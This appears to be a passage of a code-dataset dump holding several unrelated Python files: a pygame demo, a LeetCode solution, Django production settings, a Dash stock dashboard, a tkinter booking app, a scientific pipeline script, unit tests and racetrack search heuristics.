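weights = {"in_a": 0.75, "in_b": 0.25}       # weighting (e.g. intersected-area fraction) per feature
shared = set(input_values) & set(weights)    # only features present in both mappings count
weighted_average = np.sum(np.array([input_values[k] * weights[k] for k in shared]))
print(weighted_average)  # 15.0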
'''\n        if type(startTime) is not type(dt.now()):\n            raise ValueError('Start time must be a DateTime object')\n\n        if startTime.tzinfo is None:\n            raise ValueError('Start time must have a timezone attached')\n\n        if type(attributeToUse) is not type(list()):\n            attributeToUse = [attributeToUse]\n\n        if type(input) is type(float()): # Assume a single value for all space\n            return self.dealWithSingleValue(input, startTime, 'SINGLEVAL')\n\n        if type(input) is type(''): # Assume a filename\n            if epsgCode is None:\n                raise ValueError('EPSG code must be provided if a shapefile is input')\n            return self.dealWithVectorLayer(input, epsgCode, startTime, attributeToUse, weight_by, inputFieldId)\n\n        if type(input) is QgsVectorLayer:\n            return self.dealWithVectorLayer(input, epsgCode, startTime, attributeToUse, weight_by, inputFieldId)\n\n        raise ValueError('Error setting input layer for ' + str(startTime) + ': input was neither string nor float')","sub_path":"GQF/DataManagement/SpatialTemporalResampler.py","file_name":"SpatialTemporalResampler.py","file_ext":"py","file_size_in_byte":24637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"71685334","text":"import pygame\n### Initialization\npygame.init() # initialize pygame\n# screen size settings\nscreen_width = 480\nscreen_height = 640\nscreen = pygame.display.set_mode((screen_width,screen_height))\n# window title\npygame.display.set_caption(\"pygame1\")\n# FPS setting\nclock = pygame.time.Clock()\n### Initialization\n\n### User initialization\n# load the background image\nbackground = pygame.image.load(\"background1.png\")\n# load the sprite (player character)\ncharacter = pygame.image.load(\"character1.png\")\ncharacter_size = character.get_rect().size # size of the character image\ncharacter_width = character_size[0] # character width\ncharacter_height = character_size[1] # character height\ncharacter_x_pos = (screen_width-character_width)/2 # character x coordinate\ncharacter_y_pos = screen_height-character_height # character y coordinate\n# sprite - enemy\nenemy = pygame.image.load(\"enemy1.png\")\nenemy_size = enemy.get_rect().size # size of the enemy image\nenemy_width = enemy_size[0] # enemy width\nenemy_height = enemy_size[1] # enemy height\nenemy_x_pos = (screen_width-enemy_width)/2 # enemy x coordinate\nenemy_y_pos = (screen_height-enemy_height)/2 # enemy y coordinate\n# movement offsets\nto_x = 0\nto_y = 0\n# movement speed\ncharacter_speed = 0.5\n# font definition\ngame_font = pygame.font.Font(None, 40) # create the font object and set the font size\n# total time\ntotal_time = 10\n# start-time bookkeeping\nstart_ticks = pygame.time.get_ticks() # record the starting tick count\n### User initialization\n\n### Event loop\nrunning = True # is the game still running?\nwhile running:\n    dt = clock.tick(30) # frames per second of the game screen, 30-60\n    for event in pygame.event.get(): # which event occurred?\n        if event.type == pygame.QUIT: # the window-close event fired\n            running = False # the game is no longer running\n        if event.type == pygame.KEYDOWN: # a key was pressed\n            # keys\n            left = event.key == pygame.K_LEFT\n            right = event.key == pygame.K_RIGHT\n            up = event.key == pygame.K_UP\n            down = event.key == pygame.K_DOWN\n            if left: # left arrow\n                to_x -= character_speed\n            if right: # right arrow\n                to_x += character_speed\n            if up: # up arrow\n                to_y -= character_speed\n            if down: # down arrow\n                to_y += character_speed\n        if event.type == pygame.KEYUP: # key released: check event.key directly (the left/right/up/down flags may not exist yet on the first KEYUP)\n            if event.key in (pygame.K_LEFT, pygame.K_RIGHT):\n                to_x = 0\n            if event.key in (pygame.K_UP, pygame.K_DOWN):\n                to_y = 0\n    ### Position handling\n    # update coordinates\n    character_x_pos += to_x*dt\n    character_y_pos += to_y*dt\n    # character position bounds\n    char_x_minimum = 0\n    char_x_maximum = screen_width-character_width\n    char_y_minimum = 0\n    char_y_maximum = screen_height-character_height\n    \n    # clamp to the horizontal bounds\n    if character_x_pos < char_x_minimum:\n        character_x_pos = char_x_minimum\n    elif character_x_pos > char_x_maximum:\n        character_x_pos = char_x_maximum\n    # clamp to the vertical bounds\n    if character_y_pos < char_y_minimum:\n        character_y_pos = char_y_minimum\n    elif character_y_pos > char_y_maximum:\n        character_y_pos = char_y_maximum\n    ###\n\n    ### Collision handling\n    character_rect = character.get_rect()\n    character_rect.left = character_x_pos\n    character_rect.top = character_y_pos\n    enemy_rect = enemy.get_rect()\n    enemy_rect.left = enemy_x_pos\n    enemy_rect.top = enemy_y_pos\n\n    # collision check update\n    if character_rect.colliderect(enemy_rect):\n        print(\"Collision\")\n        running = False\n    ### \n    ### Draw the screen\n    #screen.fill((0,0,255))\n    screen.blit(background,(0,0)) # draw the background\n    screen.blit(character,(character_x_pos, character_y_pos)) # draw the character\n    screen.blit(enemy,(enemy_x_pos, enemy_y_pos)) # draw the enemy\n    # draw the timer\n    # compute the elapsed time\n    elapsed_time = (pygame.time.get_ticks()-start_ticks)/1000 # elapsed time (ms -> s)\n    # remaining time\n    remain_time = int(total_time-elapsed_time)\n    # text to render, antialiasing flag, color\n    timer = game_font.render(str(remain_time), True, (255,255,255))\n    screen.blit(timer, (10,10))\n    # end the game once the remaining time reaches 0 (time over)\n    if remain_time ==0:\n        running = False\n    # redraw the game screen\n    pygame.display.update() \n    ### \n### Game end\n# wait briefly\npygame.time.delay(2000) # wait 2000 ms = 2 s\n# quit pygame\npygame.quit()\n###","sub_path":"8_frame.py","file_name":"8_frame.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"190188417","text":"import copy\n\n\nclass Solution:\n    def minFallingPathSum(self, A) -> int:\n        m, n = len(A), len(A[0])\n        # dp[i][j] holds the minimum falling path sum ending at (i, j)\n        dp = copy.deepcopy(A)\n\n        for i in range(1, m):\n            for j in range(n):\n                dp[i][j] = dp[i - 1][j]\n                if j - 1 >= 0:\n                    dp[i][j] = min(dp[i][j], dp[i - 1][j - 1])\n                if j + 1 < n:\n                    dp[i][j] = min(dp[i][j], dp[i - 1][j + 1])\n                dp[i][j] += A[i][j]\n\n        return min(dp[-1])\n\n\n\n\n","sub_path":"LeetcodeNew/python/LC_931.py","file_name":"LC_931.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"239408664","text":"import os\n\nfrom .base import *\n\nDEBUG = False\nALLOWED_HOSTS = [os.environ['DOMAIN']]\n\nINSTALLED_APPS += (\n    'storages',\n    'custom_storages',\n)\n\nSECRET_KEY = os.environ['SECRET_KEY']\n\nAWS_S3_ACCESS_KEY_ID = os.environ['AWS_S3_ACCESS_KEY_ID']\nAWS_S3_SECRET_ACCESS_KEY = os.environ['AWS_S3_SECRET_ACCESS_KEY']\nAWS_S3_FILE_OVERWRITE = False\nAWS_STATIC_STORAGE_BUCKET_NAME = os.environ['AWS_STATIC_STORAGE_BUCKET_NAME']\nAWS_MEDIA_STORAGE_BUCKET_NAME = os.environ['AWS_MEDIA_STORAGE_BUCKET_NAME']\nAWS_S3_ENCRYPTION = True\nAWS_STATIC_S3_CUSTOM_DOMAIN = '{}.s3.amazonaws.com'.format(AWS_STATIC_STORAGE_BUCKET_NAME)\nAWS_MEDIA_S3_CUSTOM_DOMAIN = '{}.s3.amazonaws.com'.format(AWS_MEDIA_STORAGE_BUCKET_NAME)\nAWS_IS_GZIPPED = True\nAWS_S3_URL_PROTOCOL = 'https:'\nAWS_AUTO_CREATE_BUCKET = False\n\nSTATIC_URL = 'https://{}/'.format(AWS_STATIC_S3_CUSTOM_DOMAIN)\nMEDIA_URL = 'https://{}/'.format(AWS_MEDIA_S3_CUSTOM_DOMAIN)\n\nSTATICFILES_STORAGE = 'custom_storages.StaticStorage'\nDEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n","sub_path":"web/adoption_stories/adoption_stories/environment_settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"623510565","text":"import dash, json, os, datetime, dash_table\nimport plotly.graph_objects as go\nimport pandas as pd\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output \nfrom app import 
app\nfrom plotly.subplots import make_subplots\nfrom plotly.validators.layout import _hoverdistance\n\n\ndef loadJSON(some_json):\n import json\n with open(some_json, 'r') as content:\n data = json.load(content)\n return (data)\ndef jsonTOdict(some_list):\n import datetime\n mainrow = []\n for i in range(len(some_list)):\n for j in some_list[i]['candles']:\n row = []\n row.extend((some_list[i]['symbol'], \n j['open'], j['high'], j['low'], \n j['close'], j['volume'],\n datetime.date.fromtimestamp(j['datetime']/1000)))\n mainrow.append(row)\n return(mainrow)\n \ndat = loadJSON('C:\\\\Users\\\\alfre\\\\Desktop\\\\dash-apps\\\\update\\\\Stocks\\\\stockScreen.json')\ndata = jsonTOdict(dat)\nstock = pd.DataFrame(data, columns=['Stock', 'Open', 'High','Low', 'Close', 'Volume', 'Date'])\n\nsymbols = sorted(pd.unique(stock['Stock']))\n\nperiodDict = {'2 Months': 30, '3 Months': 90,'6 Months': 180,\n '1 Year': 365, '2 Years':730, '3 Years': 1095,}\n\n\n\n\n#Headers\nheaderLayout = html.Div(children=[\n html.H1(children=\"All Stocks at a Glance\", className= 'header-content'),],className='header')\n\nperiodFilterLayout = html.Div(children=[\n html.Div(children=\"Period\", className= 'menu-title'),\n dcc.Dropdown(id = \"period\",\n options=[{'label':period, 'value':period} for period in ('2 Months', '3 Months', '6 Months', '1 Year', '2 Years', '3 Years')],\n value='2 Months', className = 'filter-menus')], className='filter-menu2')\n\nnextButton= html.Div([\n dbc.Button(\"Next\", id=\"next-Button\", className=\"mr-2\"),\n html.Span(id=\"next-output\", style={\"vertical-align\": \"center\"})])\n\nprevButton=html.Div([\n dbc.Button(\"Previous\", id=\"prev-Button\", className=\"mr-2\"),\n html.Span(id=\"prev-output\", style={\"vertical-align\": \"center\"})])\n\nholdButton=html.Div([\n dbc.Button(\"Hold\", id=\"hold-Button\", className=\"mr-2\"),\n html.Span(id=\"hold-output\", style={\"vertical-align\": \"center\"})])\n\nmenuLayout = html.Div(children=[periodFilterLayout, prevButton, nextButton], className='menu')\n\npriceVolumeChartLayout = html.Div(children=dcc.Graph(id=\"priceVolume-chart\", config={\"displayModeBar\": False}), className='card')\ngraphLayout = html.Div(children=[priceVolumeChartLayout], className = 'wrapper')\n\nlayout = html.Div(children=[headerLayout, menuLayout, graphLayout])\n\n\n\n@app.callback(Output('priceVolume-chart', 'figure'),\n [\n Input(\"next-Button\", \"n_clicks\"),\n Input(\"prev-Button\", \"n_clicks\"),\n #Input(\"hold-Button\", \"n_clicks\"),\n Input(\"period\", \"value\"),],)\n\ndef update_graph(nxt, prv, per):\n def chartGlobalStocks(nxt, prv, per):\n \n \n stckSeries=symbols\n seriesSize = len(stckSeries)\n ind=0\n try:\n ind += nxt\n except TypeError:\n pass\n try:\n ind -= prv\n except TypeError:\n pass\n symb = stckSeries[ind%seriesSize]\n per_ = periodDict[per]\n filtered_data = stock[stock['Stock'] == stckSeries[ind%seriesSize]]\n print(filtered_data)\n filtered_data = filtered_data.iloc[-per_ :]\n fig = make_subplots(rows=2, cols=1)\n fig.add_trace(go.Scatter(x=filtered_data['Date'], y=filtered_data['Low']), row=1, col=1)\n fig.add_trace(go.Scatter(x=filtered_data[\"Date\"], y=[filtered_data['Low'].mean()]*len(filtered_data['Low']), name='avg',line=dict(color='firebrick', width=1.5,dash='dash')),)\n fig.add_trace(go.Scatter(x=filtered_data['Date'], y=filtered_data['Volume']), row=2, col=1)\n fig.add_trace(go.Bar(x=filtered_data['Date'], y=filtered_data['Volume']), row=2, col=1)\n fig.update_layout(\n #hoverdistance = 0,\n height=800, \n #width=1000, \n 
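# (suggested, not in the original) uirevision='keep' here would preserve zoom/pan state across callback updates\n            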
title_text= str(stckSeries[ind%seriesSize]), template=\"plotly_white\", showlegend=False)\n# fig.update_yaxes(showgrid=False, zeroline=False, showticklabels=False,\n# showspikes=True, spikemode='across', spikesnap='cursor', showline=False, spikedash='solid')\n# \n# fig.update_xaxes(showgrid=False, zeroline=False, rangeslider_visible=False, showticklabels=False,\n# showspikes=True, spikemode='across', spikesnap='cursor', showline=False, spikedash='solid')\n return fig \n \n x = chartGlobalStocks(nxt, prv, per)\n return(x)\n\n\n \n \n \n \n \n \n \n \n","sub_path":"insight/apps/global_.py","file_name":"global_.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"495035824","text":"import tkinter as tk # create basic Graphical User Interface elements\nimport calendar # get relevant dates\nimport datetime # get current time\nfrom functools import partial\nimport sqlite3 # database operations\n\nfrom Book_Meeting import BookMeeting\n\n\ndbConnection = sqlite3.connect('AmbassadorDatabase3.db') # Passes name of the database to connect() method\ndbCursor = dbConnection.cursor() # Create cursor object using the connection returned from connect method\n\n\nclass BookHub:\n def __init__(self, master, nameResult, ID):\n self.master = master\n self.master.geometry('1240x616')\n self.master.title('Booking Hub')\n\n self.windowFrame = tk.Frame(self.master, bg = 'lightgreen')\n self.windowFrame.grid()\n self.nameResult = nameResult\n self.ID = ID\n\n self.name = str(self.nameResult).replace(\"\\'\",\"\").replace(\"(\",\"\").replace(\")\",\"\").replace(',',\"\")\n self.Title = tk.Label(self.windowFrame, text = (str(self.name) + \"'s Availability Schedule\"), font = ('Arial', 20,'bold'), bg = 'lightgreen')\n self.description = tk.Label(self.windowFrame, text = 'Please double click a time slot that works for you.', font = ('Arial', 15, 'bold'), bg ='lightgreen')\n self.Title.grid(row = 0, column = 1)\n self.description.grid(row = 1, column = 1)\n\n self.timetableFrame = tk.Frame(self.windowFrame, bg = 'red', width = 1200, height = 700)\n self.timetableFrame.grid(row = 4, column = 1)\n self.home = tk.Button(self.windowFrame, text = 'Quit', width = 50, highlightbackground = 'lightgreen', command = self.returnHome)\n self.home.grid(row = 5, column = 1)\n self.TAavailability = dbCursor.execute('''SELECT BeforeSchool, Breaktime, Lunchtime, AfterSchool FROM AmbassadorAvailability WHERE AmbassadorID = ?''', (self.ID,))\n self.availability = [[0 for days in range(5)] for times in range(4)] # create empty 2D array\n\n counter = 0\n for e in self.TAavailability.fetchone(): # gets the string for each ambassador, e.g. 
'YYNYNNYNYNYN...'\n for i in range(5):\n self.availability[counter][i] = e[i]\n counter+= 1\n\n def double_click(button, event):\n row = int(button.grid_info()['row']) - 1\n column = int(button.grid_info()['column'])\n\n width = 248 # width of each label\n height = 133\n lowerboundX = 50 # x coordinate from very left of page\n lowerboundY = 150 # y coordinate at very top of timetable boxes\n\n x = event.x_root\n y = event.y_root\n column = 0\n\n global day\n global time\n\n\n if y < (lowerboundY+(2*height)):\n # centre y, equivalent of binary search, far faster than a FOR loop\n if y < (lowerboundY+(height)):\n time = 'BeforeSchool'\n else:\n time = 'Breaktime'\n else:\n if y < (lowerboundY+(3*height)):\n time = 'Lunchtime'\n else:\n time = 'AfterSchool'\n\n if x < (lowerboundX+(2*width)): # leftmost 2\n if x < (lowerboundX+(width)):\n day = 'Monday'\n column = 0\n else:\n day = 'Tuesday'\n column = 1\n else:\n if x < (lowerboundX+(4*width)):\n if x < (lowerboundX+(3*width)):\n day = 'Wednesday'\n column = 2\n else:\n day = 'Thursday'\n column = 3\n else:\n day = 'Friday'\n column = 4\n\n date = self.updatedDates[column][0] + \" \" + str(self.updatedDates[column][1])\n dbConnection.commit()\n self.openBookMeeting = tk.Toplevel(self.master) # opens first top level window\n self.app = BookMeeting(self.openBookMeeting, self.ID, self.name,\"Please enter your full name, class and email to book a meeting for \" + day + \" at \"+ time + \".\", date, day, time)\n\n self.rowCounter = 0\n self.columnCounter = 0\n self.updatedDates = []\n self.buttonCounter = 0\n\n self.colours = ['IndianRed1','yellow','CadetBlue1','OliveDrab1','PaleVioletRed1','tomato','yellow2','turquoise1','OliveDrab2','hot pink','firebrick1','gold','DeepSkyBlue2', 'green2', 'deep pink', 'firebrick3','goldenrod','RoyalBlue1', 'green3', 'DeepPink3']\n # loops through the colours for each day\n self.days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n self.times = ['Before School', 'Break Time', 'Lunch Time', 'After School']\n self.months = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June', 7: 'July', 8: 'August', 9: \"September\", 10: 'October', 11: 'November', 12: 'December'}\n # dictionary to convert a counter into the relevant month\n\n self.today = datetime.date.today()\n self.nextMonday = self.today + datetime.timedelta(days=-self.today.weekday(), weeks=0) # gets next Monday's data, e.g. 
2020-10-12\n        self.lastDay = calendar.monthrange(self.today.year, self.today.month) # gets the last day of the current month (use the current year, not a hard-coded one)\n\n        self.totalDayCounter = 0\n        self.newMonthcounter = 0\n        while self.totalDayCounter < 5:\n            if (self.nextMonday.day + self.totalDayCounter) > self.lastDay[1]: # if the date runs past the last day of the month\n                try:\n                    self.updatedDates.append((self.months[self.nextMonday.month + 1], 1 + self.newMonthcounter)) # date resets to 1\n                    # appends the next 5 dates to the array\n                except:\n                    self.updatedDates.append(('January', 1 + self.newMonthcounter)) # triggers if it's December - end of the year\n                    # appends the next 5 dates to the array\n                self.newMonthcounter += 1\n\n            else:\n                self.updatedDates.append((self.months[self.nextMonday.month], self.nextMonday.day + self.totalDayCounter))\n            self.totalDayCounter += 1\n\n        def handle_enter(button, event):\n            button.config(relief = 'sunken')\n\n        def handle_leave(button, event): # returns border back to normal\n            button.config(relief = 'raised')\n\n        for i in range(4): # create unique buttons and retrieves information\n            for e in range(5): # same ranges used to define the 2D availability array\n\n                if self.buttonCounter % 5 == 0: # if there is a need for a new row, every fifth button\n                    self.columnCounter = 0 # column resets to 0, otherwise continues to 5,6,7 etc.\n                    self.meetingTime = (self.days[self.columnCounter]+ ': ' + self.times[self.rowCounter] +'\\n')\n                    self.rowCounter+=1 # incremented when new row needed\n                else:\n                    self.columnCounter +=1\n                    self.meetingTime = (self.days[self.columnCounter]+ ': ' + self.times[self.rowCounter-1] + '\\n')\n                self.relevantDate = self.updatedDates[self.columnCounter][0] + \" \" + str(self.updatedDates[self.columnCounter][1])\n\n                if self.availability[i][e] == 'Y':\n                    self.button = tk.Label(self.timetableFrame, text = (self.meetingTime + self.relevantDate + '\\n\\n Available'), height = 8, width = 27,\n                        bg = self.colours[self.buttonCounter], wraplength = 225, justify = 'center', borderwidth = 2, relief = 'raised')\n                    self.button.bind('<Double-Button-1>', partial(double_click, self.button))\n                    self.button.bind(\"<Enter>\", partial(handle_enter, self.button)) # when the mouse hovers over\n                    self.button.bind(\"<Leave>\", partial(handle_leave, self.button)) # when the mouse leaves\n\n                else:\n                    self.button = tk.Label(self.timetableFrame, text = (self.meetingTime + self.relevantDate + '\\n\\n' + 'Unavailable'), height = 8, width = 27,\n                        bg = 'gray50', wraplength = 225, justify = 'center', borderwidth = 2, relief = 'raised')\n\n                self.button.grid(row = self.rowCounter, column = self.columnCounter)\n                self.buttonCounter += 1\n\n    def returnHome(self):\n        self.master.destroy()\n","sub_path":"Book_Hub.py","file_name":"Book_Hub.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"392120704","text":"import os\nimport time\n\nimport argparse\n\nimport numpy\n\nfrom mangadap.util.log import init_DAP_logging, module_logging\nfrom mangadap.par.analysisplan import AnalysisPlanSet\nfrom mangadap.survey.dapall import DAPall\n\ndef parse_args(options=None, return_parser=False):\n    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument('--plan_file', type=str, help='parameter file with the MaNGA DAP '\n                        'execution plan to use instead of the default' , default=None)\n    parser.add_argument('--drpver', type=str, help='DRP version', default=None)\n    parser.add_argument('-r', '--redux_path', type=str,\n                        help='Top-level 
directory with the DRP products; defaults to '\n                             '$MANGA_SPECTRO_REDUX/$MANGADRP_VER', default=None)\n    parser.add_argument('--dapver', type=str, help='DAP version', default=None)\n    parser.add_argument('-a', '--analysis_path', type=str,\n                        help='Top-level output directory for the DAP results; defaults to '\n                             '$MANGA_SPECTRO_ANALYSIS/$MANGADRP_VER/$MANGADAP_VER', default=None)\n    parser.add_argument('-m', '--methods', type=str, nargs='+', default=None,\n                        help='Only include output from this DAP method designation in the output')\n    parser.add_argument('-v', '--verbose', action='count',\n                        help='Set verbosity level; can be omitted and set up to -vv', default=0)\n    parser.add_argument('--quiet', action='store_true', default=False,\n                        help='suppress all terminal output')\n    parser.add_argument('--double', dest='single_precision', action='store_false', default=True,\n                        help='Output the floating-point data in double precision '\n                             '(default is single precision)')\n    if return_parser:\n        return parser\n\n    return parser.parse_args() if options is None else parser.parse_args(options)\n\ndef main(args):\n    t = time.perf_counter()\n    analysisplan = AnalysisPlanSet.default() if args.plan_file is None \\\n                    else AnalysisPlanSet.from_par_file(args.plan_file)\n\n    # Initialize the logging objects and start the log\n    init_DAP_logging(None)#, simple_warnings=False)\n    loggers = module_logging(__name__, args.verbose)\n\n    DAPall(analysisplan, methods=args.methods, drpver=args.drpver, redux_path=args.redux_path,\n           dapver=args.dapver, analysis_path=args.analysis_path, loggers=loggers, quiet=args.quiet,\n           single_precision=args.single_precision)\n\n    print('Elapsed time: {0} seconds'.format(time.perf_counter() - t))\n\n\n\n","sub_path":"mangadap/scripts/construct_dapall.py","file_name":"construct_dapall.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"23321764","text":"# Runtime 64 ms\n# Beats 98%\n# Definition for an interval.\n# class Interval:\n#     def __init__(self, s=0, e=0):\n#         self.start = s\n#         self.end = e\nclass Solution:\n    def merge(self, intervals):\n        \"\"\"\n        :type intervals: List[Interval]\n        :rtype: List[Interval]\n        \"\"\"\n        intervals = sorted(intervals, key=lambda x: x.start)\n        rst = list()\n\n        for i in intervals:\n            if not rst or rst[-1].end < i.start:\n                rst.append(i)\n            else:\n                rst[-1].end = max(rst[-1].end, i.end)\n\n        return rst\n\n\n# Note\n# 1. 
Remember to sort the list first.\n# Then several consecutive intervals can be merged into one interval.\n","sub_path":"56-Merge-Intervals/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399950169","text":"import numpy as np\nimport pickle\nimport pytest\nfrom .testutil import datadir\nfrom brainstat.mesh.data import mesh_standardize\n\n\ndef dummy_test(infile, expfile):\n\n # load input test data\n ifile = open(infile, \"br\")\n idic = pickle.load(ifile)\n ifile.close()\n\n Y = idic[\"Y\"]\n\n mask = None\n subtractordivide = \"s\"\n\n if \"mask\" in idic.keys():\n mask = idic[\"mask\"]\n\n if \"subtractordivide\" in idic.keys():\n subtractordivide = idic[\"subtractordivide\"]\n\n # run mesh_standardize\n Y_out, Ym_out = mesh_standardize(Y, mask, subtractordivide)\n\n # load expected outout data\n efile = open(expfile, \"br\")\n expdic = pickle.load(efile)\n efile.close()\n Y_exp = expdic[\"Python_Y\"]\n Ym_exp = expdic[\"Python_Ym\"]\n\n testout = []\n\n testout.append(np.allclose(Y_out, Y_exp, rtol=1e-05, equal_nan=True))\n testout.append(np.allclose(Ym_out, Ym_exp, rtol=1e-05, equal_nan=True))\n\n assert all(flag == True for (flag) in testout)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_01():\n # ['Y'] : np array, shape (1, 1), int64\n infile = datadir(\"statsta_01_IN.pkl\")\n expfile = datadir(\"statsta_01_OUT.pkl\")\n dummy_test(infile, expfile)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_02():\n # ['Y'] : np array, shape (1, 10), int64\n # ['mask'] : np array, shape (10,), bool\n infile = datadir(\"statsta_02_IN.pkl\")\n expfile = datadir(\"statsta_02_OUT.pkl\")\n dummy_test(infile, expfile)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_03():\n # ['Y'] : np array, shape (2, 10), int64\n # ['mask'] : np array, shape (10,), bool\n infile = datadir(\"statsta_03_IN.pkl\")\n expfile = datadir(\"statsta_03_OUT.pkl\")\n dummy_test(infile, expfile)\n\n\n@pytest.mark.skip(reason=\"Function pending deprecation.\")\ndef test_04():\n # ['Y'] : np array, shape (3, 4, 2), float64\n # ['mask'] : np array, shape (4,), bool\n infile = datadir(\"statsta_04_IN.pkl\")\n expfile = datadir(\"statsta_04_OUT.pkl\")\n dummy_test(infile, expfile)\n","sub_path":"brainstat/tests/test_mesh_standardize.py","file_name":"test_mesh_standardize.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"642743115","text":"\"\"\"\nFile: heuristics.py -- Dana Nau, Feb 14, 2018\n\nThis file contains three heuristic functions:\n- h_edist returns the Euclidean distance from (s) to the goal, ignoring walls;\n- h_esdist modifies h_edist to include an estimate of how long it will take to stop;\n- h_walldist computes the approximate distance to the goal without ignoring walls. \n\n Each heuristic function takes three arguments: state, edge, walls.\n state is the current state. It should have the form ((x,y), (u,v))\n edge is the finish line. 
It should have the form ((x1,y1), (x2,y2))\n walls is a list of walls, each wall having the form ((x1,y1), (x2,y2))\n\"\"\"\n\nimport racetrack, math\nimport sys # to get readline\n\n\ndef h_edist(state, edge, walls):\n \"\"\"Euclidean distance from state to edge, ignoring walls.\"\"\"\n (x, y) = state[0]\n ((x1, y1), (x2, y2)) = edge\n\n # find the smallest and largest coordinates\n xmin = min(x1, x2)\n xmax = max(x1, x2)\n ymin = min(y1, y2)\n ymax = max(y1, y2)\n\n return min([math.sqrt((xx - x) ** 2 + (yy - y) ** 2)\n for xx in range(xmin, xmax + 1) for yy in range(ymin, ymax + 1)])\n\n\ndef h_esdist(state, fline, walls):\n \"\"\"\n h_edist modified to include an estimate of how long it will take to stop.\n \"\"\"\n ((x, y), (u, v)) = state\n m = math.sqrt(u ** 2 + v ** 2)\n stop_dist = m * (m - 1) / 2.0\n return max(h_edist(state, fline, walls) + stop_dist / 10.0, stop_dist)\n\n\n# Global variables for h_walldist\n\n# in Python 3 we can just use math.inf, but that doesn't work in Python 2\ninfinity = float('inf')\n\ng_fline = False\ng_walls = False\ngrid = []\n\n\ndef h_walldist(state, fline, walls):\n \"\"\"\n The first time this function is called, for each gridpoint that's not inside a wall\n it will cache a rough estimate of the length of the shortest path to the finish line.\n The computation is done by a breadth-first search going backwards from the finish \n line, one gridpoint at a time.\n \n On all subsequent calls, this function will retrieve the cached values and add an\n estimate of how long it will take to stop. \n \"\"\"\n global g_fline, g_walls\n if fline != g_fline or walls != g_walls or grid == []:\n edist_grid(fline, walls)\n ((x, y), (u, v)) = state\n hval = float(grid[x][y])\n\n # add a small penalty to favor short stopping distances\n au = abs(u)\n av = abs(v)\n sdu = au * (au - 1) / 2.0\n sdv = av * (av - 1) / 2.0\n sd = max(sdu, sdv)\n penalty = sd / 10.0\n\n # compute location after fastest stop, and add a penalty if it goes through a wall\n if u < 0: sdu = -sdu\n if v < 0: sdv = -sdv\n sx = x + sdu\n sy = y + sdv\n if racetrack.crash([(x, y), (sx, sy)], walls):\n penalty += math.sqrt(au ** 2 + av ** 2)\n hval = max(hval + penalty, sd)\n return hval\n\n\ndef edist_grid(fline, walls):\n global grid, g_fline, g_walls, xmax, ymax\n xmax = max([max(x, x1) for ((x, y), (x1, y1)) in walls])\n ymax = max([max(y, y1) for ((x, y), (x1, y1)) in walls])\n grid = [[edistw_to_line((x, y), fline, walls) for y in range(ymax + 1)] for x in range(xmax + 1)]\n flag = True\n print('computing edist grid', end=' ')\n sys.stdout.flush()\n while flag:\n print('.', end='')\n sys.stdout.flush()\n flag = False\n for x in range(xmax + 1):\n for y in range(ymax + 1):\n for y1 in range(max(0, y - 1), min(ymax + 1, y + 2)):\n for x1 in range(max(0, x - 1), min(xmax + 1, x + 2)):\n if grid[x1][y1] != infinity and not racetrack.crash(((x, y), (x1, y1)), walls):\n if x == x1 or y == y1:\n d = grid[x1][y1] + 1\n else:\n d = grid[x1][y1] + 1.4142135623730951\n if d < grid[x][y]:\n grid[x][y] = d\n flag = True\n print(' done')\n g_fline = fline\n g_walls = walls\n return grid\n\n\ndef edistw_to_line(point, edge, walls):\n \"\"\"\n straight-line distance from (x,y) to the line ((x1,y1),(x2,y2)).\n Return infinity if there's no way to do it without intersecting a wall\n \"\"\"\n # if min(x1,x2) <= x <= max(x1,x2) and min(y1,y2) <= y <= max(y1,y2):\n # return 0\n (x, y) = point\n ((x1, y1), (x2, y2)) = edge\n if x1 == x2:\n ds = [math.sqrt((x1 - x) ** 2 + (y3 - y) ** 2) \\\n for y3 in range(min(y1, 
